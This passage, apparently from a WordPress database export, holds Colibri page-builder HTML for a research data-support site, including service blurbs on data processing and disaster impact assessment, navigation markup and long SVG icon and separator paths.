style-local-20-c17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\">\n <path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path>\n </svg></span></div>\n <div data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-275 style-local-20-c20\">\n <!---->\n <!---->\n <h5 class=\"\">Impact assessment</h5>\n </div>\n </div>\n <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Front Page','','publish','closed','closed','','colibri-wp','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/colibri-wp/',0,'page','',0),(22,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n <path 